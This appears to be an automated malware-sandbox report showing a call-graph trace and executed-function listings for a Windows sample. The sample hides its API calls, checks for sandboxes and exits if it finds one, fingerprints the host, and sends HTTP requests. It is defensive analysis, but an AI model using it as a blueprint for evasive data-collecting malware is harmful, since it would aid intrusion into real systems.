27024->27025 27026 7b49ef 27025->27026 27027 7b4a60 2 API calls 27026->27027 27028 7b4a08 27027->27028 27029 7b4a60 2 API calls 27028->27029 27030 7b4a1e 27029->27030 27031 7b4a60 2 API calls 27030->27031 27032 7b4a34 27031->27032 27033 7b4a60 2 API calls 27032->27033 27034 7b4a4a 27033->27034 27035 7d66e0 27034->27035 27036 7d66ed 43 API calls 27035->27036 27037 7d6afe 8 API calls 27035->27037 27036->27037 27038 7d6c08 27037->27038 27039 7d6b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27037->27039 27040 7d6c15 8 API calls 27038->27040 27041 7d6cd2 27038->27041 27039->27038 27040->27041 27042 7d6d4f 27041->27042 27043 7d6cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27041->27043 27044 7d6d5c 6 API calls 27042->27044 27045 7d6de9 27042->27045 27043->27042 27044->27045 27046 7d6df6 12 API calls 27045->27046 27047 7d6f10 27045->27047 27046->27047 27048 7d6f8d 27047->27048 27049 7d6f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27047->27049 27050 7d6f96 GetProcAddress GetProcAddress 27048->27050 27051 7d6fc1 27048->27051 27049->27048 27050->27051 27052 7d6fca GetProcAddress GetProcAddress 27051->27052 27053 7d6ff5 27051->27053 27052->27053 27054 7d70ed 27053->27054 27055 7d7002 10 API calls 27053->27055 27056 7d70f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27054->27056 27057 7d7152 27054->27057 27055->27054 27056->27057 27058 7d716e 27057->27058 27059 7d715b GetProcAddress 27057->27059 27060 7d7177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27058->27060 27061 7d051f 27058->27061 27059->27058 27060->27061 27062 7b1530 27061->27062 27371 7b1610 27062->27371 27064 7b153b 27065 7b1555 lstrcpy 27064->27065 27066 7b155d 27064->27066 27065->27066 27067 7b1577 lstrcpy 27066->27067 27068 7b157f 27066->27068 27067->27068 27069 7b1599 lstrcpy 27068->27069 27070 7b15a1 27068->27070 27069->27070 27071 7b1605 27070->27071 27072 7b15fd lstrcpy 27070->27072 27073 7cf1b0 lstrlen 27071->27073 27072->27071 27074 7cf1e4 27073->27074 27075 7cf1eb lstrcpy 27074->27075 27076 7cf1f7 lstrlen 27074->27076 27075->27076 27077 7cf208 27076->27077 27078 7cf20f lstrcpy 27077->27078 27079 7cf21b lstrlen 27077->27079 27078->27079 27080 7cf22c 27079->27080 27081 7cf233 lstrcpy 27080->27081 27082 7cf23f 27080->27082 27081->27082 27083 7cf258 lstrcpy 27082->27083 27084 7cf264 27082->27084 27083->27084 27085 7cf286 lstrcpy 27084->27085 27086 7cf292 27084->27086 27085->27086 27087 7cf2ba lstrcpy 27086->27087 27088 7cf2c6 27086->27088 27087->27088 27089 7cf2ea lstrcpy 27088->27089 27150 7cf300 27088->27150 27089->27150 27090 7cf30c lstrlen 27090->27150 27091 7cf4b9 lstrcpy 27091->27150 27092 7cf3a1 lstrcpy 27092->27150 27093 7cf3c5 lstrcpy 27093->27150 27094 7cf4e8 lstrcpy 27154 7cf4f0 27094->27154 27095 7b1530 8 API calls 27095->27154 27096 7cee90 28 API calls 27096->27150 27097 7cefb0 35 API calls 27097->27154 27098 7cf479 lstrcpy 27098->27150 27099 7cf59c lstrcpy 27099->27154 27100 7cf616 StrCmpCA 27101 7cf70f StrCmpCA 27100->27101 27100->27154 27105 7cfe8e 27101->27105 27101->27150 27102 7cfa29 StrCmpCA 27111 7cfe2b 27102->27111 27102->27150 27103 7cf73e lstrlen 27103->27150 27104 7cfead lstrlen 27118 7cfec7 27104->27118 27105->27104 27110 7cfea5 lstrcpy 27105->27110 27106 7cfd4d StrCmpCA 27109 7cfd60 Sleep 27106->27109 27115 7cfd75 27106->27115 27107 7cf64a lstrcpy 27107->27154 27108 7cfa58 lstrlen 27108->27150 27109->27150 27110->27104 27112 7cfe4a lstrlen 27111->27112 27113 7cfe42 lstrcpy 27111->27113 27124 7cfe64 27112->27124 27113->27112 27114 7cf89e lstrcpy 27114->27150 27116 7cfd94 lstrlen 27115->27116 27120 7cfd8c lstrcpy 27115->27120 27126 7cfdae 27116->27126 27117 7cf76f lstrcpy 27117->27150 27119 7cfee7 lstrlen 27118->27119 27122 7cfedf lstrcpy 27118->27122 27132 7cff01 27119->27132 27120->27116 27121 7cfbb8 lstrcpy 27121->27150 27122->27119 27123 7cfa89 lstrcpy 27123->27150 27125 7cfdce lstrlen 27124->27125 27127 7cfe7c lstrcpy 27124->27127 27140 7cfde8 27125->27140 27126->27125 27138 7cfdc6 lstrcpy 27126->27138 27127->27125 27128 7cf791 lstrcpy 27128->27150 27130 7b1530 8 API calls 27130->27150 27131 7cf8cd lstrcpy 27131->27154 27133 7cff21 27132->27133 27134 7cff19 lstrcpy 27132->27134 27135 7b1610 4 API calls 27133->27135 27134->27133 27157 7cfe13 27135->27157 27136 7cfaab lstrcpy 27136->27150 27137 7cf698 lstrcpy 27137->27154 27138->27125 27139 7cfbe7 lstrcpy 27139->27154 27141 7cfe08 27140->27141 27142 7cfe00 lstrcpy 27140->27142 27143 7b1610 4 API calls 27141->27143 27142->27141 27143->27157 27144 7cf7e2 lstrcpy 27144->27150 27145 7cf924 lstrcpy 27145->27154 27146 7cf99e StrCmpCA 27146->27102 27146->27154 27147 7cfafc lstrcpy 27147->27150 27148 7cfc3e lstrcpy 27148->27154 27149 7cfcb8 StrCmpCA 27149->27106 27149->27154 27150->27090 27150->27091 27150->27092 27150->27093 27150->27094 27150->27096 27150->27098 27150->27101 27150->27102 27150->27103 27150->27106 27150->27108 27150->27114 27150->27117 27150->27121 27150->27123 27150->27128 27150->27130 27150->27131 27150->27136 27150->27139 27150->27144 27150->27147 27150->27154 27151 7cf9cb lstrcpy 27151->27154 27152 7cfce9 lstrcpy 27152->27154 27153 7cee90 28 API calls 27153->27154 27154->27095 27154->27097 27154->27099 27154->27100 27154->27102 27154->27106 27154->27107 27154->27137 27154->27145 27154->27146 27154->27148 27154->27149 27154->27150 27154->27151 27154->27152 27154->27153 27155 7cfa19 lstrcpy 27154->27155 27156 7cfd3a lstrcpy 27154->27156 27155->27154 27156->27154 27157->26181 27159 7d278c GetVolumeInformationA 27158->27159 27160 7d2785 27158->27160 27161 7d27ec GetProcessHeap RtlAllocateHeap 27159->27161 27160->27159 27163 7d2826 wsprintfA 27161->27163 27164 7d2822 27161->27164 27163->27164 27381 7d71e0 27164->27381 27168 7b4c70 27167->27168 27169 7b4c85 27168->27169 27171 7b4c7d lstrcpy 27168->27171 27385 7b4bc0 27169->27385 27171->27169 27172 7b4c90 27173 7b4ccc lstrcpy 27172->27173 27174 7b4cd8 27172->27174 27173->27174 27175 7b4cff lstrcpy 27174->27175 27176 7b4d0b 27174->27176 27175->27176 27177 7b4d2f lstrcpy 27176->27177 27178 7b4d3b 27176->27178 27177->27178 27179 7b4d6d lstrcpy 27178->27179 27180 7b4d79 27178->27180 27179->27180 27181 7b4dac InternetOpenA StrCmpCA 27180->27181 27182 7b4da0 lstrcpy 27180->27182 27183 7b4de0 27181->27183 27182->27181 27184 7b54b8 InternetCloseHandle CryptStringToBinaryA 27183->27184 27185 7b4def 27183->27185 27186 7b54e8 LocalAlloc 27184->27186 27203 7b55d8 27184->27203 27389 7d3e70 lstrcpy lstrcpy GetSystemTime 27185->27389 27188 7b54ff CryptStringToBinaryA 27186->27188 27186->27203 27189 7b5529 lstrlen 27188->27189 27190 7b5517 LocalFree 27188->27190 27191 7b553d 27189->27191 27190->27203 27193 7b5563 lstrlen 27191->27193 27194 7b5557 lstrcpy 27191->27194 27192 7b4dfa 27195 7b4e23 lstrcpy lstrcat 27192->27195 27196 7b4e38 27192->27196 27198 7b557d 27193->27198 27194->27193 27195->27196 27197 7b4e5a lstrcpy 27196->27197 27200 7b4e62 27196->27200 27197->27200 27199 7b558f lstrcpy lstrcat 27198->27199 27201 7b55a2 27198->27201 27199->27201 27202 7b4e71 lstrlen 27200->27202 27204 7b55d1 27201->27204 27206 7b55c9 lstrcpy 27201->27206 27205 7b4e89 27202->27205 27203->26210 27204->27203 27207 7b4e95 lstrcpy lstrcat 27205->27207 27208 7b4eac 27205->27208 27206->27204 27207->27208 27209 7b4ed5 27208->27209 27210 7b4ecd lstrcpy 27208->27210 27211 7b4edc lstrlen 27209->27211 27210->27209 27212 7b4ef2 27211->27212 27213 7b4efe lstrcpy lstrcat 27212->27213 27214 7b4f15 27212->27214 27213->27214 27215 7b4f36 lstrcpy 27214->27215 27216 7b4f3e 27214->27216 27215->27216 27217 7b4f65 lstrcpy lstrcat 27216->27217 27218 7b4f7b 27216->27218 27217->27218 27219 7b4fa4 27218->27219 27220 7b4f9c lstrcpy 27218->27220 27221 7b4fab lstrlen 27219->27221 27220->27219 27222 7b4fc1 27221->27222 27223 7b4fcd lstrcpy lstrcat 27222->27223 27224 7b4fe4 27222->27224 27223->27224 27225 7b500d 27224->27225 27226 7b5005 lstrcpy 27224->27226 27227 7b5014 lstrlen 27225->27227 27226->27225 27228 7b502a 27227->27228 27229 7b5036 lstrcpy lstrcat 27228->27229 27230 7b504d 27228->27230 27229->27230 27231 7b5079 27230->27231 27232 7b5071 lstrcpy 27230->27232 27233 7b5080 lstrlen 27231->27233 27232->27231 27234 7b509b 27233->27234 27235 7b50ac lstrcpy lstrcat 27234->27235 27236 7b50bc 27234->27236 27235->27236 27237 7b50da lstrcpy lstrcat 27236->27237 27238 7b50ed 27236->27238 27237->27238 27239 7b510b lstrcpy 27238->27239 27240 7b5113 27238->27240 27239->27240 27241 7b5121 InternetConnectA 27240->27241 27241->27184 27242 7b5150 HttpOpenRequestA 27241->27242 27243 7b518b 27242->27243 27244 7b54b1 InternetCloseHandle 27242->27244 27390 7d7310 lstrlen lstrcpy lstrcat 27243->27390 27244->27184 27246 7b519b 27391 7d7280 lstrcpy 27246->27391 27248 7b51a4 27392 7d72c0 lstrcpy lstrcat 27248->27392 27250 7b51b7 27393 7d7280 lstrcpy 27250->27393 27252 7b51c0 27394 7d7310 lstrlen lstrcpy lstrcat 27252->27394 27254 7b51d5 27395 7d7280 lstrcpy 27254->27395 27256 7b51de 27396 7d7310 lstrlen lstrcpy lstrcat 27256->27396 27258 7b51f4 27397 7d7280 lstrcpy 27258->27397 27260 7b51fd 27398 7d7310 lstrlen lstrcpy lstrcat 27260->27398 27262 7b5213 27399 7d7280 lstrcpy 27262->27399 27264 7b521c 27400 7d7310 lstrlen lstrcpy lstrcat 27264->27400 27266 7b5231 27401 7d7280 lstrcpy 27266->27401 27268 7b523a 27402 7d72c0 lstrcpy lstrcat 27268->27402 27270 7b524d 27403 7d7280 lstrcpy 27270->27403 27272 7b5256 27404 7d7310 lstrlen lstrcpy lstrcat 27272->27404 27274 7b526b 27405 7d7280 lstrcpy 27274->27405 27276 7b5274 27406 7d7310 lstrlen lstrcpy lstrcat 27276->27406 27278 7b5289 27407 7d7280 lstrcpy 27278->27407 27280 7b5292 27408 7d72c0 lstrcpy lstrcat 27280->27408 27282 7b52a5 27409 7d7280 lstrcpy 27282->27409 27284 7b52ae 27410 7d7310 lstrlen lstrcpy lstrcat 27284->27410 27286 7b52c3 27411 7d7280 lstrcpy 27286->27411 27288 7b52cc 27412 7d7310 lstrlen lstrcpy lstrcat 27288->27412 27290 7b52e2 27413 7d7280 lstrcpy 27290->27413 27292 7b52eb 27414 7d7310 lstrlen lstrcpy lstrcat 27292->27414 27294 7b5301 27415 7d7280 lstrcpy 27294->27415 27296 7b530a 27416 7d7310 lstrlen lstrcpy lstrcat 27296->27416 27298 7b531f 27417 7d7280 lstrcpy 27298->27417 27300 7b5328 27418 7d72c0 lstrcpy lstrcat 27300->27418 27302 7b533b 27419 7d7280 lstrcpy 27302->27419 27304 7b5344 27305 7b537c 27304->27305 27306 7b5370 lstrcpy 27304->27306 27420 7d72c0 lstrcpy lstrcat 27305->27420 27306->27305 27308 7b538a 27421 7d72c0 lstrcpy lstrcat 27308->27421 27310 7b5397 27422 7d7280 lstrcpy 27310->27422 27312 7b53a1 27313 7b53b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27312->27313 27314 7b549c InternetCloseHandle 27313->27314 27318 7b53f2 27313->27318 27316 7b54ae 27314->27316 27315 7b53fd lstrlen 27315->27318 27316->27244 27317 7b542e lstrcpy lstrcat 27317->27318 27318->27314 27318->27315 27318->27317 27319 7b546b lstrcpy 27318->27319 27320 7b547a InternetReadFile 27318->27320 27319->27318 27320->27314 27320->27318 27322 7c8cc6 ExitProcess 27321->27322 27324 7c8ccd 27321->27324 27323 7c8ee2 27323->26212 27324->27323 27325 7c8dbd StrCmpCA 27324->27325 27326 7c8ddd StrCmpCA 27324->27326 27327 7c8dfd StrCmpCA 27324->27327 27328 7c8e1d StrCmpCA 27324->27328 27329 7c8e3d StrCmpCA 27324->27329 27330 7c8d5a lstrlen 27324->27330 27331 7c8e56 StrCmpCA 27324->27331 27332 7c8d30 lstrlen 27324->27332 27333 7c8e6f StrCmpCA 27324->27333 27334 7c8e88 lstrlen 27324->27334 27335 7c8d84 StrCmpCA 27324->27335 27336 7c8da4 StrCmpCA 27324->27336 27337 7c8d06 lstrlen 27324->27337 27338 7c8ebb lstrcpy 27324->27338 27325->27324 27326->27324 27327->27324 27328->27324 27329->27324 27330->27324 27331->27324 27332->27324 27333->27324 27334->27324 27335->27324 27336->27324 27337->27324 27338->27324 27339->26218 27340->26220 27341->26226 27342->26228 27343->26234 27344->26236 27345->26242 27346->26246 27347->26252 27348->26254 27349->26258 27350->26272 27351->26276 27352->26275 27353->26271 27354->26275 27355->26293 27356->26278 27357->26279 27358->26283 27359->26289 27360->26290 27361->26297 27362->26300 27363->26306 27364->26329 27365->26333 27366->26332 27367->26328 27368->26332 27369->26342 27372 7b161f 27371->27372 27373 7b162b lstrcpy 27372->27373 27374 7b1633 27372->27374 27373->27374 27375 7b164d lstrcpy 27374->27375 27376 7b1655 27374->27376 27375->27376 27377 7b166f lstrcpy 27376->27377 27378 7b1677 27376->27378 27377->27378 27379 7b1699 27378->27379 27380 7b1691 lstrcpy 27378->27380 27379->27064 27380->27379 27382 7d71e6 27381->27382 27383 7d71fc lstrcpy 27382->27383 27384 7d2860 27382->27384 27383->27384 27384->26207 27386 7b4bd0 27385->27386 27386->27386 27387 7b4bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27386->27387 27388 7b4c41 27387->27388 27388->27172 27389->27192 27390->27246 27391->27248 27392->27250 27393->27252 27394->27254 27395->27256 27396->27258 27397->27260 27398->27262 27399->27264 27400->27266 27401->27268 27402->27270 27403->27272 27404->27274 27405->27276 27406->27278 27407->27280 27408->27282 27409->27284 27410->27286 27411->27288 27412->27290 27413->27292 27414->27294 27415->27296 27416->27298 27417->27300 27418->27302 27419->27304 27420->27308 27421->27310 27422->27312 27453 7d31f0 GetSystemInfo wsprintfA 27428 7b5869 57 API calls 27456 7c1269 408 API calls 27447 7d2d60 11 API calls 27468 7d2b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 27469 7da280 __CxxFrameHandler 27448 7c3959 244 API calls 27454 7c01d9 126 API calls 27437 7d2cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27429 7d2853 lstrcpy 27430 7ce049 147 API calls 27481 7c8615 48 API calls 27470 7c8615 49 API calls 27438 7d3cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27482 7d33c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27457 7bf639 144 API calls 27462 7b16b9 200 API calls 27471 7bbf39 177 API calls 27451 7d3130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 27483 7cabb2 120 API calls 27475 7c4b29 304 API calls 27484 7c23a9 298 API calls 27459 7b8e20 strlen malloc free std::exception::exception 27439 7d30a0 GetSystemPowerStatus 27455 7d29a0 GetCurrentProcess IsWow64Process 27485 7bdb99 675 API calls 27441 7d749e 8 API calls ctype 27432 7d8819 6 API calls __getptd 27442 7c2499 290 API calls 27486 7c8615 47 API calls 27452 7d4e35 9 API calls 27476 7b7710 free ctype 27477 7d9711 139 API calls __setmbcp 27434 7d2c10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 27478 7bb309 98 API calls 27443 7c8c88 16 API calls 27435 7b100d GetCurrentProcess VirtualAllocExNuma ExitProcess VirtualAlloc VirtualFree 27444 7d2880 10 API calls 27445 7d3480 6 API calls 27446 7d4480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 27463 7d3280 7 API calls

                              Executed Functions

                              Function 007D6390 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1786 7d6390-7d63bd GetPEB 1787 7d65c3-7d6623 LoadLibraryA * 5 1786->1787 1788 7d63c3-7d65be call 7d62f0 GetProcAddress * 20 1786->1788 1789 7d6638-7d663f 1787->1789 1790 7d6625-7d6633 GetProcAddress 1787->1790 1788->1787 1792 7d666c-7d6673 1789->1792 1793 7d6641-7d6667 GetProcAddress * 2 1789->1793 1790->1789 1795 7d6688-7d668f 1792->1795 1796 7d6675-7d6683 GetProcAddress 1792->1796 1793->1792 1797 7d66a4-7d66ab 1795->1797 1798 7d6691-7d669f GetProcAddress 1795->1798 1796->1795 1800 7d66ad-7d66d2 GetProcAddress * 2 1797->1800 1801 7d66d7-7d66da 1797->1801 1798->1797 1800->1801
                              APIs
                              • GetProcAddress.KERNEL32(75900000,01450760), ref: 007D63E9
                              • GetProcAddress.KERNEL32(75900000,01450748), ref: 007D6402
                              • GetProcAddress.KERNEL32(75900000,01450790), ref: 007D641A
                              • GetProcAddress.KERNEL32(75900000,01450688), ref: 007D6432
                              • GetProcAddress.KERNEL32(75900000,01458828), ref: 007D644B
                              • GetProcAddress.KERNEL32(75900000,01444F00), ref: 007D6463
                              • GetProcAddress.KERNEL32(75900000,01444E60), ref: 007D647B
                              • GetProcAddress.KERNEL32(75900000,01450568), ref: 007D6494
                              • GetProcAddress.KERNEL32(75900000,01450550), ref: 007D64AC
                              • GetProcAddress.KERNEL32(75900000,014506A0), ref: 007D64C4
                              • GetProcAddress.KERNEL32(75900000,014507C0), ref: 007D64DD
                              • GetProcAddress.KERNEL32(75900000,01444E20), ref: 007D64F5
                              • GetProcAddress.KERNEL32(75900000,01450700), ref: 007D650D
                              • GetProcAddress.KERNEL32(75900000,01450580), ref: 007D6526
                              • GetProcAddress.KERNEL32(75900000,01444DA0), ref: 007D653E
                              • GetProcAddress.KERNEL32(75900000,014506D0), ref: 007D6556
                              • GetProcAddress.KERNEL32(75900000,01450850), ref: 007D656F
                              • GetProcAddress.KERNEL32(75900000,01444EE0), ref: 007D6587
                              • GetProcAddress.KERNEL32(75900000,01450910), ref: 007D659F
                              • GetProcAddress.KERNEL32(75900000,01444E00), ref: 007D65B8
                              • LoadLibraryA.KERNEL32(014508F8,?,?,?,007D1C03), ref: 007D65C9
                              • LoadLibraryA.KERNEL32(01450868,?,?,?,007D1C03), ref: 007D65DB
                              • LoadLibraryA.KERNEL32(01450898,?,?,?,007D1C03), ref: 007D65ED
                              • LoadLibraryA.KERNEL32(014508C8,?,?,?,007D1C03), ref: 007D65FE
                              • LoadLibraryA.KERNEL32(01450880,?,?,?,007D1C03), ref: 007D6610
                              • GetProcAddress.KERNEL32(75070000,014508B0), ref: 007D662D
                              • GetProcAddress.KERNEL32(75FD0000,014508E0), ref: 007D6649
                              • GetProcAddress.KERNEL32(75FD0000,01458C08), ref: 007D6661
                              • GetProcAddress.KERNEL32(75A50000,01458E60), ref: 007D667D
                              • GetProcAddress.KERNEL32(74E50000,01445000), ref: 007D6699
                              • GetProcAddress.KERNEL32(76E80000,01458928), ref: 007D66B5
                              • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 007D66CC
                              Strings
                              • NtQueryInformationProcess, xrefs: 007D66C1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: 447bfa9eeaf61ffe6f69da2d4c70933ae97f37c7cca4bf21eec666bba96fc4f3
                              • Instruction ID: aeb686542027dc892e1ffe89112e1990181ad2a7b0983eda59ef29cafe96b789
                              • Opcode Fuzzy Hash: 447bfa9eeaf61ffe6f69da2d4c70933ae97f37c7cca4bf21eec666bba96fc4f3
                              • Instruction Fuzzy Hash: 6FA162F5939280DFD754DFA5EDC8A2637B9F7892463808919E919CB360DB34AD00FB60
                              Function 007D1BF0 Relevance: 45.2, APIs: 30, Instructions: 220stringCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1802 7d1bf0-7d1c0b call 7b2a90 call 7d6390 1807 7d1c0d 1802->1807 1808 7d1c1a-7d1c27 call 7b2930 1802->1808 1809 7d1c10-7d1c18 1807->1809 1812 7d1c29-7d1c2f lstrcpy 1808->1812 1813 7d1c35-7d1c63 1808->1813 1809->1808 1809->1809 1812->1813 1817 7d1c6d-7d1c7b GetSystemInfo 1813->1817 1818 7d1c65-7d1c67 ExitProcess 1813->1818 1819 7d1c7d-7d1c7f ExitProcess 1817->1819 1820 7d1c85-7d1ca0 call 7b1030 call 7b10c0 GetUserDefaultLangID 1817->1820 1825 7d1cb8-7d1cca call 7d2ad0 call 7d3e10 1820->1825 1826 7d1ca2-7d1ca9 1820->1826 1832 7d1ccc-7d1cde call 7d2a40 call 7d3e10 1825->1832 1833 7d1ce7-7d1d06 lstrlen call 7b2930 1825->1833 1826->1825 1827 7d1cb0-7d1cb2 ExitProcess 1826->1827 1832->1833 1846 7d1ce0-7d1ce1 ExitProcess 1832->1846 1839 7d1d08-7d1d0d 1833->1839 1840 7d1d23-7d1d40 lstrlen call 7b2930 1833->1840 1839->1840 1841 7d1d0f-7d1d11 1839->1841 1847 7d1d5a-7d1d7b call 7d2ad0 lstrlen call 7b2930 1840->1847 1848 7d1d42-7d1d44 1840->1848 1841->1840 1844 7d1d13-7d1d1d lstrcpy lstrcat 1841->1844 1844->1840 1854 7d1d7d-7d1d7f 1847->1854 1855 7d1d9a-7d1db4 lstrlen call 7b2930 1847->1855 1848->1847 1849 7d1d46-7d1d54 lstrcpy lstrcat 1848->1849 1849->1847 1854->1855 1857 7d1d81-7d1d85 1854->1857 1860 7d1dce-7d1deb call 7d2a40 lstrlen call 7b2930 1855->1860 1861 7d1db6-7d1db8 1855->1861 1857->1855 1859 7d1d87-7d1d94 lstrcpy lstrcat 1857->1859 1859->1855 1867 7d1ded-7d1def 1860->1867 1868 7d1e0a-7d1e0f 1860->1868 1861->1860 1862 7d1dba-7d1dc8 lstrcpy lstrcat 1861->1862 1862->1860 1867->1868 1869 7d1df1-7d1df5 1867->1869 1870 7d1e16-7d1e22 call 7b2930 1868->1870 1871 7d1e11 call 7b2a20 1868->1871 1869->1868 1873 7d1df7-7d1e04 lstrcpy lstrcat 1869->1873 1876 7d1e24-7d1e26 1870->1876 1877 7d1e30-7d1e66 call 7b2a20 * 5 OpenEventA 1870->1877 1871->1870 1873->1868 1876->1877 1878 7d1e28-7d1e2a lstrcpy 1876->1878 1889 7d1e8c-7d1ea0 CreateEventA call 7d1b20 call 7cffd0 1877->1889 1890 7d1e68-7d1e8a CloseHandle Sleep OpenEventA 1877->1890 1878->1877 1894 7d1ea5-7d1eae CloseHandle ExitProcess 1889->1894 1890->1889 1890->1890
                              APIs
                                • Part of subcall function 007D6390: GetProcAddress.KERNEL32(75900000,01450760), ref: 007D63E9
                                • Part of subcall function 007D6390: GetProcAddress.KERNEL32(75900000,01450748), ref: 007D6402
                                • Part of subcall function 007D6390: GetProcAddress.KERNEL32(75900000,01450790), ref: 007D641A
                                • Part of subcall function 007D6390: GetProcAddress.KERNEL32(75900000,01450688), ref: 007D6432
                                • Part of subcall function 007D6390: GetProcAddress.KERNEL32(75900000,01458828), ref: 007D644B
                                • Part of subcall function 007D6390: GetProcAddress.KERNEL32(75900000,01444F00), ref: 007D6463
                                • Part of subcall function 007D6390: GetProcAddress.KERNEL32(75900000,01444E60), ref: 007D647B
                                • Part of subcall function 007D6390: GetProcAddress.KERNEL32(75900000,01450568), ref: 007D6494
                                • Part of subcall function 007D6390: GetProcAddress.KERNEL32(75900000,01450550), ref: 007D64AC
                                • Part of subcall function 007D6390: GetProcAddress.KERNEL32(75900000,014506A0), ref: 007D64C4
                                • Part of subcall function 007D6390: GetProcAddress.KERNEL32(75900000,014507C0), ref: 007D64DD
                                • Part of subcall function 007D6390: GetProcAddress.KERNEL32(75900000,01444E20), ref: 007D64F5
                                • Part of subcall function 007D6390: GetProcAddress.KERNEL32(75900000,01450700), ref: 007D650D
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007D1C2F
                              • ExitProcess.KERNEL32 ref: 007D1C67
                              • GetSystemInfo.KERNEL32(?), ref: 007D1C71
                              • ExitProcess.KERNEL32 ref: 007D1C7F
                                • Part of subcall function 007B1030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 007B1046
                                • Part of subcall function 007B1030: VirtualAllocExNuma.KERNEL32(00000000), ref: 007B104D
                                • Part of subcall function 007B1030: ExitProcess.KERNEL32 ref: 007B1058
                                • Part of subcall function 007B10C0: GlobalMemoryStatusEx.KERNEL32 ref: 007B10EA
                                • Part of subcall function 007B10C0: ExitProcess.KERNEL32 ref: 007B1114
                              • GetUserDefaultLangID.KERNEL32 ref: 007D1C8F
                              • ExitProcess.KERNEL32 ref: 007D1CB2
                              • ExitProcess.KERNEL32 ref: 007D1CE1
                              • lstrlen.KERNEL32(014588F8), ref: 007D1CEE
                              • lstrcpy.KERNEL32(00000000,?), ref: 007D1D15
                              • lstrcat.KERNEL32(00000000,014588F8), ref: 007D1D1D
                              • lstrlen.KERNEL32(007E4B98), ref: 007D1D28
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1D48
                              • lstrcat.KERNEL32(00000000,007E4B98), ref: 007D1D54
                              • lstrlen.KERNEL32(00000000), ref: 007D1D63
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1D89
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007D1D94
                              • lstrlen.KERNEL32(007E4B98), ref: 007D1D9F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1DBC
                              • lstrcat.KERNEL32(00000000,007E4B98), ref: 007D1DC8
                              • lstrlen.KERNEL32(00000000), ref: 007D1DD7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007D1DF9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007D1E04
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
